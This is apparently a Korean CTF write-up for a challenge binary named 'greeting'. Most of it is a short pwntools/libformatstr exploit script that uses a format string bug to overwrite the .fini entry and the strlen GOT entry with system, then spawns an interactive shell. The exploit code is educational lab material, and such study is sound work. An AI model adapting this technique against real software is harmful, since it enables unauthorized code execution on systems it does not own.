728x90
오랜만에 올리는 라업! 내일 면접인데 잘보게 해주세요 ㅎㅎ
이 문제 또한 오랜만에 하는 FSB라서 재미있었다!!!
오늘 TIPS에 libformatstr에 대해서 포스팅 했는데 알자마자 써본 문제중 하나다!!!
pwntools에도 fmtstr이 있다지만 사용법을 잘 모르겠어서 libformatstr을 사용했다!
from pwn import *
from libformatstr import *
s = process("./greeting")
elf = ELF("./greeting")
#12, AAAAAA
#fini is 0x08049934
gdb.attach(s,'b *0x0804864F')
s.recvuntil("Please tell me your name... ")
p = FormatStr()
p[0x08049934] = 0x080485ED
p[elf.got['strlen']] = elf.plt['system']
pay = p.payload(12,2,18)
s.sendline(pay)
s.sendline("sh")
s.interactive()
'PWN > CTF' 카테고리의 다른 글
| [Codegate 2019] got-the-reum (0) | 2019.02.05 |
|---|---|
| [codegate 2018] marimo (0) | 2019.01.24 |
| [PCTF 2015] prodmanager (0) | 2019.01.05 |
| [DefCamp CTF 2016] Warm heap (0) | 2019.01.03 |
| [SECCON 2016] checker (0) | 2018.12.30 |